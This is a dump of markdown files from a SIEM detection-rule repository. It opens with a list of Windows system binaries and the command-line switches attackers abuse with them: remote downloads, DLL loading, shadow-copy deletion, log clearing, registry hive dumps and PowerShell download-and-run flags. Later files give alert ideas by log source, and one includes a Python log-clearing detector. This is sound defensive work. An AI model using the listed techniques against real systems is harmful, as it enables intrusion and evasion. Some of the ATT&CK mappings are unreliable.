  - "-target:" to compile code locally, bypassing defenses. (T1127)

- cscript.exe
  - ".js"
  - ".jse"
  - ".vba"
  - ".vbe"
  - ".vbs"
  - ".wsf"
  - "//e:" to execute a script file with a specific engine (not a typo, two slashes)

- datasvcutil.exe
  - "http" to upload files (T1567)

- desktopimagedownldr.exe
  - "http" to download a file and set it as the screensaver (T1105)

- diantz.exe
  - ":" to compress a file into an alternate data stream (T1564.004)
  - "http" to download and compress a file (T1105)

- diskshadow.exe
  - "/s" to execute a prepared diskshadow script (T1003.003)
  - "> exec " to execute a child process (T1202)

- dnscmd.exe
  - "/config" AND "/serverlevelplugindll" to add a malicious dll as a plugin of the DNS service. (T1543.003)

- esentutl.exe
  - "/y" AND "/vss" to copy a file via volume shadow copy (T1003.003)
  - "y" AND "/d" AND ":" AND "/o" to copy a file to an alternate data stream (T1564.004)
  - "http" to download a file (T1564.004)

- expand.exe
  - ":" to expand into an alternate data stream. (T1564.004)

- extexport.exe
  - ":\" to load an executable named mozcrt19.dll, mozsqlite3.dll, or sqlite.dll from a supplied folder path (T1218)

- extrac32.exe
  - ":" to extract a CAB file into an alternate data stream. (T1564.004)
  - "/C" to copy a file to another folder. (T1105)

- explorer.exe
  - ".exe" to indirectly execute commands (T1202)

- findstr.exe
  - ":" and "/V" to write to an alternate data stream (T1564.004)

- finger.exe
  - "http" to download a malicious payload (T1105)

- fltMC.exe
  - "unload" to unload a driver used by a security agent (T1562.001)
  - "detach" (T1054)

- forfiles.exe
  - "/p" and "/m" to execute another binary (T1202)

- fsutil.exe
  - "setZeroData" to forensically erase a file (T1485)
  - "deletejournal" to delete the USN journal volume, hiding file creation activity (T1485)
  - "trace decode" to execute a binary named netsh.exe from the current directory (T1218)

- ftp.exe
  - "-s:" to execute cmd commands from a referenced text file (T1202)

- hh.exe
  - "http" to download a file (T1105)
  - ".exe" to execute another executable (T1218.001)

- ie4uinit.exe
  - "-BaseSettings" to execute malicious commands from a prepared ie4uinit.inf file (T1218)

- iediagcmd.exe
  - "set" and "/out:" to execute a binary that is pre-planted at C:\somedir\system32\netsh.exe. (T1218)

- ieexec.exe
  - "http" to download a file (T1105)

- ilasm.exe
  - "/exe" or "/dll" to compile a file (T1127)

- installutil.exe
  - "http" to download a file to INetCache (T1105)

- imewdbld.exe
  - "http" to download a file to INetCache (T1105)

- InstallUtil.exe
  - "logfile="
  - "LogToConsole=false"
  - "/U" (T1118)

- ldifde.exe
  - "-i -f" to import a file into LDAP (T1105)

- mavinject.exe
  - "/injectrunning" to inject a dll into a process (T1218.013)

- MpCmdRun.exe
  - "DownloadFile" to download from internet (T1105)
  - "Add-MpPreference"
  - "RemoveDefinitions"
  - "DisableIOAVProtection" (T1089)

- mofcomp.exe
  - "-N" AND "\\" (WMI with remote host namespace)

- msconfig.exe
  - "-5" to execute commands inside crafted c:\windows\system32\mscfgtlc.xml (T1218)

- msdt.exe
  - "PCWDiagnostic" to execute arbitrary code (T1202)

- mshta.exe
  - ".hta" AND "c:\users" to execute a .hta file in user space (T1218.005)
  - "http" to download a file (T1105)
  - "vbscript" to execute vbscript file (T1218.005)
  - "javascript" to execute javascript file (T1218.005)
  - ":" to interact with an alternate data stream (T1218.005)

- msiexec.exe
  - "/i" OR "/y" AND "http" to download and install remote msi (T1218.007)
  - "/i" OR "/y" AND "ftp" to download and install remote msi (T1218.007)
  - "/i" OR "/y" AND "c:\users" to install msi (T1218.007)
  - "TRANSFORMS=" to leverage a secondary, malicious file (T1218.007)

- net
  - with "localgroup" AND "/add"
  - with "user" AND "/add"

- netsh.exe
  - "add helper" to execute a given .dll and gain persistence (T1546.007)

- netstat

- ngen.exe
  - "http" or "\d+\.\d+\.\d+\.\d+" to download a file (T1105)

- nltest.exe
  - "domain_trusts" (T1482)

- odbcconf.exe
  - "/A" to execute DllRegisterServer from the DLL specified. (T1218.008)
  - "/F" to load the DLL specified in the target .RSP file. (T1218.008)

- OfflineScannerShell.exe
  - "OfflineScannerShell" to execute mpclient.dll library in the current working directory (T1218)

- pcalua.exe
  - "-a" to get this exe to open another command or DLL (T1202)

- pcwrun.exe
  - ".exe" to get this exe to open another command or DLL (T1202)

- pnputil.exe
  - "-i -a" to install drivers (T1547)

- PowerShell.exe OR powershell_ise.exe
  - "-noprofile" OR "-nop"
  - "hidden"
  - "-noninteractive" OR "-noni"
  - "-executionpolicy" OR "-ep"
  - "bypass"
  - "-encodedcommand" OR "-e" OR "-enc"
  - "invoke-webrequest" OR "iwr" OR "curl" OR "wget"
  - "invoke-restmethod" OR "irm"
  - "invoke-expression" OR "iex"
  - "invoke-wmimethod" OR "invoke-cimmethod"
  - "bitstransfer"
  - "downloadstring"
  - "downloadfile"
  - "winhttprequest"
  - "http"
  - "ftp"
  - "get-ciminstance" OR "gcim"
  - "get-wmiobject" OR "gwmi"
  - "ToBase64String"
  - "FromBase64String"
  - "set-wmiinstance"
  - "createInstance"
  - "nishang" with "Enable-DuplicateToken"
  - "nishang" with "Get-LsaSecret"
  - "-stream" to interact with an alternate data stream

- presentationhost.exe
  - "http" to download a remote file (T1105)

- print.exe
  - "/d:" to copy or hide something inside an alternate data stream (T1564.004, T1105)

- psr.exe
  - "/gui 0" to record the user's screen without creating a GUI (T1113)

- rasautou.exe
  - "-d" AND "-p" to load a target DLL and execute an export (T1218)

- rdrleakdiag.exe
  - "/p" to dump a process (T1003)

- reg.exe
  - "add" to add registry objects
  - "export" to export registry objects (T1564.004)
  - "save" to dump hives (T1003.002)

- regasm.exe
  - ".dll" to load target DLL (T1218.009)

- regedit.exe
  - "/s" to silently import .reg files
  - "/e" to export registry objects

- register-cimprovider.exe
  - ".dll" to load a dll (T1218)

- regsvcs.exe
  - ".dll" to load a dll (T1218.009)

- regsvr32.exe
  - "/i" AND "scrobj.dll" to execute a .SCT file with scrobj.dll (T1218.010)

- rundll32.exe
  - "javascript" to execute javascript code (T1218.011)
  - ".dll" AND "\users\" to execute a .dll file in userspace (T1218.011)
  - ".dll" AND "http" to execute a .dll file from the Internet (T1218.011)

- runonce.exe
  - "/AlternateShellStartup" to execute a Run Once Task preconfigured in registry (T1218)

- runscripthelper.exe
  - "surfacecheck" to execute a PowerShell script with an arbitrary name and extension (T1218)

- sc.exe
  - "create" AND "start" to create and run a service (T1564.004)
  - "config" AND "start" to modify and run a service (T1564.004)

- schtasks.exe
  - "create" to create a new scheduled task (T1053.005)

- scriptrunner.exe
  - "appvscript" to execute a binary (T1202)

- shadowcopy
  - "delete" (T1059, T1490)

- taskkill.exe
  - [with any of your known antivirus/protection executable names]


- verclsid.exe
  - "/C" to proxy execution of code

- vssadmin.exe
  - "delete" (T1059, T1490) to delete volume shadow copy
  - "resize" AND "/maxsize" to neuter volume shadow copy

- wbadmin.exe
  - "delete" (T1059, T1490)

- wevtutil.exe
  - "cl" to clear event logs
  - "clear-log" to clear event logs

- wmic.exe where commandline contains
  - "process call create"
  - "useraccount list full"
  - "group list full"
  - "netuse list full"
  - "qfe get"
  - "startup get"
  - "service get"




## [Blacklist Alert](https://github.com/TonyPhipps/SIEM/blob/master/Detection-Methods.md#blacklist-alarm)
- Commandline Obfuscation
- Commandline containing
  - a caret (^) (T1027)
  - /c echo
  - two double quotes ("")
  - a comma immediately followed by a semicolon (,;)
  - a semicolon immediately followed by a comma (;,)
  - consecutive commas
  - consecutive semicolons
  - COMSPEC (part of %COMSPEC%)
  - /\\ OR \\/ OR \\.\\ OR /./ OR \\./ OR ..
  - | cmd OR |cmd
  - final


## Whitelist Alert


## Levenshtein Score Alert


## Rolling Whitelist Alert



## Shannon Entropy Score Alert


## Threshold Alert


# Log Source Examples
- Windows Security Event ID 4104 (Enable ScriptBlock Logging)
- Windows Security Event ID 4103 (Enable Module Logging)
- Windows PowerShell Transcription Log (File)
  - Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription\
  - Create new DWORD EnableInvocationHeader = 1
  - Create new DWORD EnableTranscripting = 1
  - Create new STRING VALUE OutputDirectory =
  - Logs will be stored in .txt files in the specified directory, using the format `..\YYYYMMDD\PowerShell_transcript.PCNAME.RANDOM.YYYYMMDDHHMMSS.txt`
- Endpoint Detection AND Response product


# Possible False Positives
- Many commandline activities performed by authorized privileged users may false-positive on this content.



# References
- https://lolbas-project.github.io/
- https://github.com/3CORESec/MAL-CL

--------------------------------------------------------------------------------
/Tactics/Configuration-Change.md:
--------------------------------------------------------------------------------
# Configuration Change Use Cases

Grouped by [Detection Method](/Detection-Methods.md)


## Aggregate Count
- Count of Changes per Source User
- Count of Changes per Source System


## Blacklist Alert



## Whitelist Alert
- Audit Policy Changed by Unexpected User
- Audit Policy Changed at Unexpected Time of Day
- Audit Policy Changed at Unexpected Day of Week


## Levenshtein Score Alert


## Rolling Whitelist Alert


## Shannon Entropy Score Alert


## Threshold Alert


# Log Source Examples


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/DNS-Request.md:
--------------------------------------------------------------------------------
# DNS Request Use Cases

Grouped by [Detection Method](/Detection-Methods.md)


## Aggregate Count
- Requests per System


## Blacklist Alert
- Known-Bad Domain Name
- Known-Bad Server IP
- OS Update Requests to External Servers (e.g. Ubuntu update traffic could reveal a rogue system)
- Successful resolution for "WPAD" domain
- Communication with Newly Registered Domain


## Whitelist Alert
- A source system with an unrecognized naming convention is observed
- Requests for domains not in a Top-Million list are observed


## Levenshtein Score Alert
- Typosquatting Company Domains


## Rolling Whitelist Alert
- Newly Observed Domain
- Newly Observed Source Process


## Shannon Entropy Score Alert
- High-Entropy Domain Name
- High-Entropy TXT Queries (RCODE:16)


## Threshold Alert
- Requests where type=TXT and TXT field length exceeds X characters (filter by RCODE=16)
- Number of unique domain requests from a single system exceeds X amount in Y time (aggregate on fields: source system, unique_question_count)
- Number of requests with DNS Type TXT from a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=16)
- Number of requests with DNS Type NULL from a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=10)
- Number of requests with DNS Type CNAME from a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=5)
- Number of DNS requests for multiple subdomains of a single parent domain exceeds X amount in Y time (aggregate on fields: source system) (T1520)
- Parent domain text length exceeds X characters
- Number of responses with code SERVFAIL to a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=2)
- Number of responses with code NXDOMAIN to a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=3)
- Number of responses with code REFUSED to a single system exceeds X amount in Y time (aggregate on fields: source system; filter by RCODE=5)


## Deviation from Baseline Alarm
- Deviation in Requests for DNS Type TXT
- Deviation in Requests for DNS Type NULL
- Deviation in Requests for DNS Type CNAME
- Deviation in Response Code NXDOMAIN
- Deviation in Response Code SERVFAIL
- Deviation in Response Code REFUSED


# Log Source Examples
- DHCP Server Logs
- Microsoft Sysmon Event ID 22: DNSEvent (DNS query)


# Possible False Positives



# References
- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
- https://docs.microsoft.com/en-us/powershell/module/dnsclient/resolve-dnsname?view=windowsserver2019-ps
- https://www.rsreese.com/parsing-microsoft-dns-server-logs/
- https://blueteamblog.com/7-ways-to-detect-malicious-dns-traffic-using-siem

--------------------------------------------------------------------------------
/Tactics/Email-Traffic.md:
--------------------------------------------------------------------------------
# Email Traffic Use Cases


Grouped by [Detection Method](/Detection-Methods.md)


## Aggregate Count
- Count of Outbound Emails per Source User/System
- Count of Inbound Emails per Source User/System
- Count of Outbound Emails per Destination User
- Count of Inbound Emails per Destination User
- Count of Unique Destination Users per Source User/System


## Blacklist Alert
- Known-Bad SMTP User Agent
- Inbound Emails Using Internal Email Address as Source or Reply-to
- Email Attachments with Consecutive Spaces or Extensions (e.g. .docx.exe)
- Outbound Email to Known-Bad Addresses


## Whitelist Alert



## Levenshtein Score Alert
- Typosquatting Company Domains


## Rolling Whitelist Alert
- Newly Observed SMTP User Agent
- Newly Observed Destination Email Domain
- Newly Observed Source Email Domain


## Shannon Entropy Score Alert
- High Entropy Domain Name Observed


## Threshold Alert
- Source User, Direction=Outbound where Source User Count exceeds threshold
- Source System, Direction=Outbound where Source System Count exceeds threshold
- Source User, Direction=Inbound where Source User Count exceeds threshold
- Source System, Direction=Inbound where Source System Count exceeds threshold
- Destination SMTP Server, Direction=Outbound where Destination SMTP Server Count exceeds threshold
- Subject=Non-Delivery Report where Count exceeds threshold


# Log Source Examples
- Email server logs
- Email secure gateway logs
- Endpoint Email client logs


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/File-Access.md:
--------------------------------------------------------------------------------
# File Access Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert
- NTDS.dit


## Aggregate Count
- Access of .ost, .pst files (Outlook Email Archives)


## Blacklist Alert
- A business confidential file is accessed


## Whitelist Alert


## Levenshtein Score Alert


## Rolling Whitelist Alert


## Shannon Entropy Score Alert


## Threshold Alert


# Log Source Examples
- Windows Security Event ID 4656: A handle to an object was requested
- Host-Based IPS Signatures
- Cloud Bucket Logs



# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/File-Content.md:
--------------------------------------------------------------------------------
# File Content Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert



## Aggregate Count


## Blacklist Alert


## Whitelist Alert


## Levenshtein Score Alert


## Rolling Whitelist Alert


## Shannon Entropy Score Alert


## Threshold Alert


# Log Source Examples


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/File-Creation.md:
--------------------------------------------------------------------------------
# File Creation Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert
- New Startup items created at
  - %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
- File Created with Known-Malicious Name
- File Created in System Space by Process in User Space
- User creating a .dll file
- Any .mof file creation (WMI Consumer)


## Aggregate Count
- Count of User and Extension
- Count of User and File Path
- Count of Process and File Path
- 10 or more unique .txt files saved within 1 min


## Blacklist Alert
- File Created in System Folders by unexpected accounts (Local System)
  - c:\windows\
  - c:\windows\fonts\
  - c:\windows\system32\
- File Created in User Space by Privileged Account
- File Created that matches known-system executables
  - sethc.exe
  - utilman.exe
  - osk.exe
  - narrator.exe
  - magnify.exe
  - displayswitch.exe
  - etc
- Files typically related to ransomware "recovery"
  - .txt file with one or more of the following
    - Two or more !'s
    - name contains "decrypt"
    - name contains "recover"
    - name contains "restore"
    - File name starts with !


## Whitelist Alert
- File Created with Known-System Name in Unexpected Folder
- Executable File Created in User Space
- A file is created in a non-standard location (e.g. a non-ini/otf/compositefont/ttc/ttf/fon/dat/tmp file created in c:\windows\fonts)


## Levenshtein Score Alert
- Suspicious File Name Closely Matching System File Name


## Rolling Whitelist Alert
- Newly Observed Destination File Extension
- Newly Observed Source Process, Destination File Extension
- Newly Observed Source Process, Destination File Path
- Newly Observed Source User, Destination File Extension
- Newly Observed Source User, Destination File Path


## Shannon Entropy Score Alert
- File Created with High Entropy Score


## Threshold Alert


# Log Source Examples
- Microsoft Sysmon Event ID 11: FileCreate
- Windows Security Event ID 4656: A handle to an object was requested
- Host-Based IPS Signatures
- Cloud Bucket Logs


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/File-Deletion.md:
--------------------------------------------------------------------------------
# File Deletion Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert


## Aggregate Count


## Blacklist Alert


## Whitelist Alert


## Levenshtein Score Alert


## Rolling Whitelist Alert


## Shannon Entropy Score Alert


## Threshold Alert


# Log Source Examples


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/File-Modification.md:
--------------------------------------------------------------------------------
# File Modification Use Cases

Grouped by [Detection Method](/Detection-Methods.md)


## Aggregate Count


## Blacklist Alert
- Changes to hosts file
- Changes by an unexpected user to any file under c:\ root
- Changes by an unexpected user to any file under c:\program files\
- Changes by an unexpected user to any file under c:\program files (x86)\
- Changes by an unexpected user to any file under c:\windows\
- Changes to files in another user's home directory
- Changes to files in folder path containing 'inetpub' or 'wwwroot'
- Changes to c:\windows\system32\drivers\etc\hosts

## Whitelist Alert


## Levenshtein Score Alert


## Rolling Whitelist Alert


## Shannon Entropy Score Alert


## Threshold Alert


# Log Source Examples
- Cloud Bucket Logs


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/File-Rename.md:
--------------------------------------------------------------------------------
# File Rename Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert


## Aggregate Count


## Blacklist Alert


## Whitelist Alert


## Levenshtein Score Alert


## Rolling Whitelist Alert


## Shannon Entropy Score Alert


## Threshold Alert


# Log Source Examples


# Possible False Positives

--------------------------------------------------------------------------------
/Tactics/Group-Access.md:
--------------------------------------------------------------------------------
# Group Access Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Creation.md: -------------------------------------------------------------------------------- 1 | # Group Creation Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Deletion.md: -------------------------------------------------------------------------------- 1 | # Group Deletion Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Modifcation.md: -------------------------------------------------------------------------------- 1 | # Group Modification Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate 
Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Group-Rename.md: -------------------------------------------------------------------------------- 1 | # Group Rename Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | ## Aggregate Count 9 | 10 | 11 | ## Blacklist Alert 12 | 13 | 14 | ## Whitelist Alert 15 | 16 | 17 | ## Levenshtein Score Alert 18 | 19 | 20 | ## Rolling Whitelist Alert 21 | 22 | 23 | ## Shannon Entropy Score Alert 24 | 25 | 26 | ## Threshold Alert 27 | 28 | 29 | # Log Source Examples 30 | 31 | 32 | # Possible False Positives 33 | -------------------------------------------------------------------------------- /Tactics/Instance-Creation.md: -------------------------------------------------------------------------------- 1 | # Instance Creation Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## Blacklist Alert 13 | 14 | 15 | ## Whitelist Alert 16 | 17 | 18 | ## Levenshtein Score Alert 19 | 20 | 21 | ## Rolling Whitelist Alert 22 | 23 | 24 | ## Shannon Entropy Score Alert 25 | 26 | 27 | ## Threshold Alert 28 | 29 | 30 | # Log Source Examples 31 | 32 | 33 | # Possible False Positives 34 | -------------------------------------------------------------------------------- /Tactics/Instance-Deletion.md: -------------------------------------------------------------------------------- 1 | # Instance Deletion Use Cases 2 | 3 | Grouped by [Detection Method](/Detection-Methods.md) 4 | 5 | ## Match Alert 6 | 7 | 8 | 9 | ## Aggregate Count 10 | 11 | 12 | ## 
Blacklist Alert

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Instance-Modification.md: --------------------------------------------------------------------------------

# Instance Modification Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert

## Aggregate Count

## Blacklist Alert

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Instance-Start.md: --------------------------------------------------------------------------------

# Instance Start Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert

## Aggregate Count

## Blacklist Alert

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Instance-Stop.md: --------------------------------------------------------------------------------

# Instance Stop Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Match Alert

## Aggregate Count

## Blacklist Alert

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Log-Clearing.md: --------------------------------------------------------------------------------

# Log Clearing Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

MITRE ATT&CK Framework: [Indicator Removal on Host (T1070)](https://attack.mitre.org/techniques/T1070/)

- Clearing event logs is a way for adversaries to cover their tracks. Once events are forwarded to a central collector, legitimate clearing should be rare, which makes this a low-noise detection. Avoid configuring event logs to stop when full ("do not overwrite events") or to grow so large that administrators clear them by hand; both produce the benign clears that would otherwise hide a malicious one.
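The three detection methods this page lists for log clearing (a blacklist hit on Event ID 1102, a threshold on Event ID 1104 per host, and a rolling whitelist of the user who cleared the log), run over a constructed sample of normalized Security events. This is an added example, not code from the SIEM repository; the event dictionaries, the ten-minute window, the threshold of three and the baseline cut-off date are assumptions chosen for the demonstration.

```python
"""Log-clearing detections over normalized Windows Security events."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the shape a SIEM normalizes from the Security log.
# 1102 = the audit log was cleared, 1104 = the security log is now full.
EVENTS = [
    {"time": "2024-03-01T08:00:00", "host": "WS01", "event_id": 4624, "user": "alice"},
    {"time": "2024-03-01T08:05:00", "host": "WS01", "event_id": 1102, "user": "alice"},
    {"time": "2024-03-01T09:00:00", "host": "SRV01", "event_id": 1104, "user": "SYSTEM"},
    {"time": "2024-03-01T09:02:00", "host": "SRV01", "event_id": 1104, "user": "SYSTEM"},
    {"time": "2024-03-01T09:04:00", "host": "SRV01", "event_id": 1104, "user": "SYSTEM"},
    {"time": "2024-03-01T09:06:00", "host": "SRV01", "event_id": 1104, "user": "SYSTEM"},
    {"time": "2024-03-02T10:00:00", "host": "WS02", "event_id": 1102, "user": "alice"},
    {"time": "2024-03-02T10:30:00", "host": "WS02", "event_id": 1102, "user": "mallory"},
]

THRESHOLD = 3                        # 1104 events per host ...
WINDOW = timedelta(minutes=10)       # ... inside this sliding window (assumed)
BASELINE_END = datetime(2024, 3, 2)  # users seen clearing logs before this are "known" (assumed)


def detect(events):
    """Return (method, host, detail) alerts in event order."""
    alerts = []
    recent_full = defaultdict(deque)  # host -> timestamps of 1104 within WINDOW
    known_clearers = set()            # rolling whitelist of users who cleared a log
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        if e["event_id"] == 1102:
            # Blacklist: a cleared audit log is always worth an alert.
            alerts.append(("blacklist", e["host"], f"audit log cleared by {e['user']}"))
            # Rolling whitelist: learn users during the baseline, alert on new ones after it.
            if t >= BASELINE_END and e["user"] not in known_clearers:
                alerts.append(("rolling_whitelist", e["host"],
                               f"newly observed log-clearing user {e['user']}"))
            known_clearers.add(e["user"])
        elif e["event_id"] == 1104:
            # Threshold: count "log is full" per host inside a sliding window and
            # fire once, at the moment the count reaches THRESHOLD.
            q = recent_full[e["host"]]
            q.append(t)
            while t - q[0] > WINDOW:
                q.popleft()
            if len(q) == THRESHOLD:
                alerts.append(("threshold", e["host"],
                               f"{len(q)} 'log is full' events within {WINDOW}"))
    return alerts


if __name__ == "__main__":
    for method, host, detail in detect(EVENTS):
        print(f"{method:17} {host:6} {detail}")
```

The rolling whitelist only starts alerting after the baseline date, so the first clear by `alice` trains the list rather than firing; a repeated 1104 on one host fires a single alert when the window fills instead of one per event.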
## Aggregate Count

## Blacklist Alert
- Event log cleared (Security Event ID 1102)

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert
- Newly Observed Source User clearing a log

## Shannon Entropy Score Alert

## Threshold Alert
- EventId=1104 where Count exceeds threshold (a log that repeatedly fills is either undersized or being flooded to push older evidence out)

# Log Source Examples
- Windows Security Event ID 1102: The audit log was cleared
- Windows Security Event ID 1104: The security log is now full
- Windows System Event ID 104: The System or Application log file was cleared (1102 only covers the Security log)

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Module-Load.md: --------------------------------------------------------------------------------

# Module Load Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count
- Full paths of loaded modules

## Blacklist Alert
- Modules loaded from user-writable locations (profile, temp and download directories) rather than system or program directories

## Whitelist Alert
- Anomalous load of System.Management.Automation.dll (the PowerShell engine hosted by a process other than powershell.exe)
- explorer.exe loading unexpected DLLs

## Levenshtein Score Alert

## Rolling Whitelist Alert

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples
- Sysmon Event ID 7: Image Loaded

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/NGAV-Alarms.md: --------------------------------------------------------------------------------

# Next-Generation Antivirus Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count
- Count of Alarms per Source User
- Count of Alarms per Source System

## Blacklist Alert
- Any Server Firing Alarms

## Whitelist Alert

## Levenshtein Score Alert

## Rolling Whitelist Alert
- Newly Observed Virus Scan Signature
- Newly Observed Virus Scan Signature per System/User

## Shannon Entropy Score Alert

## Threshold Alert

# Log Source Examples

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Network-Activity-by-Flow.md: --------------------------------------------------------------------------------

# Network Activity by Flow Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count

## Blacklist Alert
- Known-Bad Destination Port Use

## Whitelist Alert
- Anomalous Destination Port Use

## Levenshtein Score Alert

## Rolling Whitelist Alert
- Newly observed Source System, Protocol
- Newly observed Source System, HourOfDay

## Shannon Entropy Score Alert

## Threshold Alert
- Source System, Destination System, Protocol=UDP where Count exceeds threshold
- Source/Destination System, Protocol=TCP where Count exceeds threshold
- Source/Destination System, Bytes In Total where Bytes In Total exceeds threshold
- Source/Destination System, Bytes Out Total where Bytes Out Total exceeds threshold
- Source/Destination System, Bytes In Total, Bytes Out Total, Bytes In/Out Ratio where Bytes In/Out Ratio exceeds threshold
- Source/Destination System, Connection Length where Connection Length exceeds threshold

# Log Source Examples
- NetFlow Logs
- IPFIX Logs
- sFlow Logs
- VPC Flow Logs

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Network-Activity-by-IP.md: --------------------------------------------------------------------------------

# Network Activity by IP Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count

## Blacklist Alert
- Egress Traffic to Known-Bad Port
- Ingress Traffic from Known-Bad IP
- Egress Traffic to Known Sinkhole IP
- Allowed Ingress Border Traffic on port 3389 (RDP)
- Allowed Ingress Border Traffic on port 6568 (AnyDesk)
- Allowed Ingress Border Traffic on port 6129, 6132, or 6133 (DameWare)
- Allowed Ingress Border Traffic on port 5938 (TeamViewer)
- Allowed Ingress Border Traffic on port 5800 or 5900 (VNC)

## Whitelist Alert
- Anomalous Destination Port Use

## Levenshtein Score Alert

## Rolling Whitelist Alert
- Newly observed Source System, Protocol
- Newly observed Source System, HourOfDay

## Shannon Entropy Score Alert

## Threshold Alert
- Source System, Destination System, Protocol=UDP where Source System Count exceeds threshold
- Source System, Destination System, Protocol=UDP where Destination System Count exceeds threshold
- Source System, Protocol=TCP where Count exceeds threshold
- Destination System, Protocol=TCP where Count exceeds threshold

# Log Source Examples
- Layer 3 or 7 Firewall Logs

# Possible False Positives

-------------------------------------------------------------------------------- /Tactics/Network-Activity-by-Process.md: --------------------------------------------------------------------------------

# Network Activity by Process Use Cases

Grouped by [Detection Method](/Detection-Methods.md)

## Aggregate Count

## Blacklist Alert
- mstsc.exe from an unexpected source user
- wscript.exe
- cscript.exe
- bitsadmin.exe

## Whitelist Alert
- Unexpected Process Names with network activity

## Levenshtein Score Alert
- Processes Matching or Similar to System Processes in Unexpected Directories

## Rolling Whitelist Alert
- Newly observed Process
- Newly observed Port
- Newly observed Source Port
- Newly observed Source Port Name
- Newly observed Destination Port
- Newly observed Destination Port Name

## Shannon Entropy Score Alert
- Processes with Random Names

## Threshold Alert
- Source System, Destination System, Protocol=UDP where Source System Count exceeds threshold
